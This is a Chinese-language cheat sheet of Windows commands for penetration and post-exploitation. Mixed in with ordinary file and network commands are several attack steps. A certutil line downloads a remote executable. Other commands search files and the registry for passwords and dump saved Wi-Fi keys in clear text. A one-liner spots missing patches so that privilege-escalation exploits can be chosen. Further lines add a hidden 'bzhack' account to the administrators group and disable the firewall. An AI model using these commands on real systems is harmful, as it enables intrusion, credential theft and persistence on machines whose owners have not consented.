渗透命令
ertutil—–从远程url下载文件
案例:certutil -urlcache -split -f http://baidu.com/test.exe
findstr—–查找文件后缀结果
findstr /s /i “pass” .py
reg query HKLM /f password /t REG_SZ /s—–搜集注册表中的各种密码数据
查看有没有开启远程链接,运行下面命令:
REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections
结果:1表示关闭,0表示开启
快速查找未打补丁的exp
systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i “%i”|| @echo %i you can exp)&del /f /q /a bzhack.txt
常用命令
ipconfig/all—–网络配置情况
ipconfig /displaydns—–查看本地DNS缓存
netsh wlan show profile—–查看连接过的 wifi 名
netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码
query user—–查当前机器中正在线的用户,看管理员在不在
net view——显示域列表/计算机列表
net user——查看当前所有账号,判断域规模
net group—–查看当前域所有的组名
net user bzhack pass /add—–增加用户
net user bzhack /del—–删除用户
net Localgroup—–添加、显示本地组
net localgroup administrators bzhack /add—–将bzhack加入管理员组
net share—– 查看当前机器开启的共享
文件操作
md—–建文件夹
rd—–删除文件夹
tree—–显示文件夹结构
dir—–显示磁盘目录内容
copy—–复制文件
Xcopy—–copy加强版,复制文件夹
del—–删除文件
ren—–[原文件/夹名][新文件/夹名]修改文件名
type—–查看文本内容
dir /a /s /b d:"*.conf”—–搜索d盘里conf结尾的文件
edit—–文本编辑
type—–显示文件内容
网络命令
netstat -a—– 列出所有端口
netstat -p—– 显示 PID 和进程名称
netstat -r—– 显示核心路由信息
netstat -at—–列出所有tcp连接
netstat -au—–列出所有ucp连接
netstat -an |find “3389” 查看开启3389端口的信息
netstat -ano | findstr “ESTABLISHED” 查看当前正处于连接状态的端口及ip
netstat -ano | findstr “LISTENING” 查看当前正处于监听状态的端口及ip
其他命令
ver—–查看版本
hostname—–查看机器名
whoami—–查看权限
systeminfo—–查看配置
tasklist—–查看进程
cls—–清屏
net start—–查看开启的服务,比如Terminal Services 远程连接服务
net stop sharedaccess—–关闭防火墙
set—–查看当前机器的环境变量,看有没有我们可以直接利用到的语言环境
fsutil fsinfo drives—–列出当前机器上的所有盘符